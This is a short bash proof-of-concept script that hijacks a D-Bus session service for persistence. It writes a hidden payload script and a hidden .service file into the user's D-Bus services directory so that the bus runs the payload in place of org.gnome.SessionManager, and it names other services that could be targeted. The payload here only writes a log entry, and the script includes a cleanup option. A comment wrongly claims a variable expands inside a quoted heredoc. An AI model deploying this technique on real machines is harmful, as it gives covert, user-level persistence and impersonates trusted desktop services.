#!/bin/bash
# D-Bus Service Hijacking Proof Of Concept
# Where to write the D-Bus configuration file to.
DBUS_DIR="$HOME/.local/share/dbus-1/services"
# The service we will hijack.
# Other hijacking candidates include: org.gtk.Settings
# org.gtk.vfs.Daemon
# org.gtk.vfs.GoaVolumeMonitor
# org.gtk.vfs.UDisks2VolumeMonitor
# etc....
SERVICE="org.gnome.SessionManager"
# Creates ~/.local/share/dbus-1/services/.persistence_payload.sh
# ~/.local/share/dbus-1/services/.dbus.service
run_default() {
# Create the $DBUS_DIR directory if it does not exist
mkdir -p "$DBUS_DIR"
# Create a hidden payload script
cat > "$DBUS_DIR/.persistence_payload.sh" << 'EOL'
#!/bin/bash
LOG_FILE="$HOME/poc.log"
mkdir -p "$(dirname "$LOG_FILE")"
SVC="${SERVICE}" # This will expand the current value of SERVICE
echo "[$(date)] Persistence activated via $SVC" >> "$LOG_FILE"
# Execute original binary if provided
[ -n "$2" ] && [ -x "$2" ] && "$2" "$@" &
# Keep the process alive
while true; do sleep 5; done
EOL
# Make the payload executable
chmod +x "$DBUS_DIR/.persistence_payload.sh"
# Create the service file for $SERVICE
cat > "$DBUS_DIR/.$SERVICE.service" << EOL
[D-BUS Service]
Name=$SERVICE
Exec=$DBUS_DIR/.persistence_payload.sh "$SERVICE"
EOL
echo "Created persistence for $SERVICE"
ls -lah "$DBUS_DIR"
echo "Service persistence installed."
}
run_cleanup() {
rm -f "$DBUS_DIR"/.*service
rm -f "$DBUS_DIR"/.*.sh
echo "Removed all files from $DBUS_DIR"
}
# Run ./poc.sh --cleanup to remove service config and payload
if [[ "$1" == "--cleanup" ]]; then
run_cleanup
else
run_default
fi